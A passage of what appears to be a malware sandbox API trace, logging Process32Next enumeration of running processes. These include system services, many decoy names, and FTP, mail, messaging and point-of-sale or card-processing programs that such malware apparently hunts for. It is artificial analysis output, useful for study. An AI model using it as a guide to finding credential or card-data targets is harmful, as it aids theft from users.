hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.391] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.393] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.394] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.395] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.397] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.398] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.400] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0291.401] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0291.411] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.412] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.414] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0291.415] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0291.417] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0291.418] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.420] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.421] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0291.422] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.424] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0291.425] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0291.427] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0291.428] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0291.430] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0291.431] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0291.432] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0291.434] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0291.436] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0291.437] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0291.438] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0291.440] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0291.441] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0291.443] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0291.444] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0291.445] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0291.447] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0291.448] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0291.450] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0291.498] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0291.499] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0291.501] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0291.503] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0291.504] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0291.506] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0291.507] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0291.509] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0291.511] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0291.513] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0291.515] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0291.518] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0291.520] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0291.521] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0291.523] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0291.525] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0291.527] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0291.529] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0291.531] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0291.533] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0291.534] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0291.536] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0291.538] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0291.540] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0291.542] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0291.572] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0291.574] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0291.576] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0291.578] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0291.580] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0291.582] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0291.583] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0291.585] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0291.587] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0291.588] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0291.595] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0291.597] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0291.599] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0291.600] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0291.602] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0291.604] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0291.605] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0291.607] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0291.609] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0291.610] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0291.612] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0291.613] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: 